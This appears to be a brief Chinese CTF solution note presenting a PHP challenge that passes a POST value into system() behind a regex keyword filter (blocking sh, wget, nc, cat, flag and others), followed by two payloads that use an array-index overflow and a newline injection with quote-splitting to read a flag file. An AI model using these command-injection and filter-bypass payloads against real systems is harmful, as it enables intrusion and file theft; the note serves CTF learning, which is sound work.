<?php//php5.5.9$stuff = $_POST["stuff"];$array = ['admin', 'user'];if($stuff === $array && $stuff[0] != 'admin') {$num= $_POST["num"];if (preg_match("/^\d+$/im",$num)){if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){echo "my favorite num is:";system("echo ".$num);}else{echo 'Bonjour!';}}}else{highlight_file(__FILE__);}
payload:
stuff[4294967296]=admin&stuff[]=user&num=123%0aa=fl;b=ag;tac /$a$b
stuff[4294967296]=admin&stuff[]=user&num=123%0aca’’t /fl’’ag
另
对于没有定义$arr[0]=’admin’,定义的[4294967296]=’admin’
但是$arr===$array却是返回的true
并且$arr[0]!=’admin’ 也是返回true
俺也不知道为啥,记着吧
若有收获,就点个赞吧
0 人点赞
